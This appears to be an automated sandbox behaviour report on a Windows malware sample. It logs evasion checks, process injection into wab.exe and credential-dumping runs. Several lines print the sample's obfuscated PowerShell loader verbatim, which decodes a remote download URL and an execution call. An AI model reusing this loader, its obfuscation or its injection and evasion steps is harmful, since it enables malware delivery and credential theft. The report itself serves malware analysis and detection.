Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 3EE1B0F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 14_2_0040DD85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6347 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3527 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7566 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2194 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 758 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 8707 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: foregroundWindowGot 1759 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 9.6 %
Source: C:\Windows\System32\wscript.exe TID: 7048 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1808 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6280 Thread sleep count: 7566 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6280 Thread sleep count: 2194 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5156 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6912 Thread sleep time: -134000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6408 Thread sleep time: -2274000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6408 Thread sleep time: -26121000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_213610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 10_2_213610F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_21366580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA, 10_2_21366580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW, 14_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 15_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00418981 memset,GetSystemInfo, 14_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000005.00000002.2520001892.0000000007A77000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
Source: powershell.exe, 00000002.00000002.2660345822.00000284A5265000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
Source: wscript.exe, 00000000.00000003.2094969947.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094557386.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094849673.00000222CB520000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2096463612.00000222CB521000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095846541.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2096763553.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095487135.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087476305.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2091106100.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089840993.00000222CD3C6000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3372008001.00000000057FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bhvEF08.tmp.14.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: wscript.exe, 00000000.00000002.2097022655.00000222CD3F9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}w
Source: wscript.exe, 00000000.00000003.2094557386.00000222CD3A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\S
Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04EA9AD9 LdrInitializeThunk, 5_2_04EA9AD9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_213660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_213660E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 14_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 14_2_004044A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_21364AB4 mov eax, dword ptr fs:[00000030h] 10_2_21364AB4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_2136724E GetProcessHeap, 10_2_2136724E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_213660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_213660E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_21362B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_21362B1C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_21362639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_21362639

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: amsi64_3516.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5512, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3A70000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 69F8D0 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xmgittpzhob" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iglbtlabvwtooe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\kiztuekujelbqlwip" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens unblessed assimilerings silverrod cirsith200 bespake lucres galvanography medansvaret trommesalsmaleri badutspringene batwoman journalnummeret dobbeltkvartet clover coffeeroom calamiform urophobia kloakeringsomraaderne electroculture euphemist bjergmassivernes uhjlpeligste stalinismens telekommunikationens';if (${host}.currentculture) {$fightet++;}function fyrstendmme($aldersforskellens){$breddesekunder=$aldersforskellens.length-$fightet;$energi='substri';$energi+='ng';for( $standsforskellenes=7;$standsforskellenes -lt $breddesekunder;$standsforskellenes+=8){$unblessed+=$aldersforskellens.$energi.invoke( $standsforskellenes, $fightet);}$unblessed;}function illish($phagedaena){ . ($triangularize) ($phagedaena);}$opholdsstuernes=fyrstendmme 'ove,logmp sternostudentzb,throdibasommal,ovangslcopywria rbefol/aphidic5blokskr.overvaa0duarchy genrefo(reser,ewdistrusiosm.regnspacersdcert,fiopassiarwinterjespeckedi nydelignmontr ctanticle medinde1 overcr0elastom.un.erfo0renounc; topot. bia ricwtrimninijetsrunnlsdelfl6hovmodi4forrykk;nautica stra hsxsne ker6cohea.t4 theop.; prster selvcerentase v undres:undecor1fejlber2phyllos1martial.konkurr0fdevand)yawlers abiologfemkronevejrm.lckommandkbemyndio ti skr/vaaben.2 relati0 fanwr 1flugtni0gerning0analyse1udmanvr0sidetal1lin.les appo,ehfcyk lbaisamekhurcalioloemoa lesfrester o,estselxudsp ng/ aandev1 asiali2tubercl1,eperso. drydde0 fogf,u ';$sorteringens=fyrstendmme 'paakrveu antedas sjaelaevulkankr baga e-tjenesta.nderprgmemoryletelak cn ndtjentdesinfi ';$bespake=fyrstendmme 'arthrozh lat,setlaveslat 